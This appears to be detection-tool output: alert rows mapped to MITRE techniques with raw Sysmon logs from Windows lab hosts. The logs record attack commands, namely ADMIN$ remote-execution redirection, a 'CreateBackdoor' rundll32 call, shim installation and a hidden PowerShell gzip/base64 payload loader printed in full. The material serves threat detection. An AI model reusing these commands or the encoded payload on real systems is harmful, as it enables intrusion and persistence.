+ 3840 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028584.802196,2019-03-20T00:49:44.802196+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966408 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:44.712 + 365ABB72-55E8-5C91-0000-001037DF0700 + 4052 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +Command run remotely Using WMI,1607599134.733908,2020-12-10T15:18:54.733908+04:00,,Threat,Critical,User (NT AUTHORITY\LOCAL SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 549600 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-10 11:18:54.576 + 747F3D96-041E-5FD2-0000-001024DF3B00 + 5580 + C:\Windows\System32\wbem\WmiPrvSE.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Provider Host + Microsoft® Windows® Operating System + Microsoft Corporation + Wmiprvse.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-7E79-5FD2-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B + 00000000-0000-0000-0000-000000000000 + 832 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1618950781.944115,2021-04-21T00:33:01.944115+04:00,,Threat,Low,Found User (MSEDGEWIN10\user03) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578499 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:33:00.318 + 747F3D96-3A7C-607F-0000-001058067700 + 2740 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\System32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\user03 + 747F3D96-3A7C-607F-0000-002075057700 + 0x770575 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-3A77-607F-0000-00105DD17600 + 7280 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034691.122589,2020-01-15T00:44:51.122589+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 337 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.978 + 747F3D96-2842-5E1E-0000-0010745E7A00 + 1568 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "cmd.exe" /c notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + rundll32 url.dll,FileProtocolHandler ms-browser:// + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656513.168589,2019-05-01T00:35:13.168589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9833 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:12.340 + 365ABB72-B180-5CC8-0000-00102BB71E00 + 1504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + C:\windows\system32\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B17F-5CC8-0000-001082A51E00 + 3572 + C:\Windows\System32\mmc.exe + C:\Windows\system32\mmc.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,FileProtocolHandler ms-browser://)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436040.330766,2019-07-30T01:34:00.330766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace stop ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4950 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.370 + 747F3D96-6646-5D3F-0000-0010913A8B00 + 6232 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh trace stop + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243558 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.452 + 747F3D96-9F69-5E75-0000-001035972000 + 1388 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243558 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.452 + 747F3D96-9F69-5E75-0000-001035972000 + 1388 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden , -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line ("powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9809 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:52.356 + 365ABB72-AF8C-5CC8-0000-001003361900 + 2484 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hO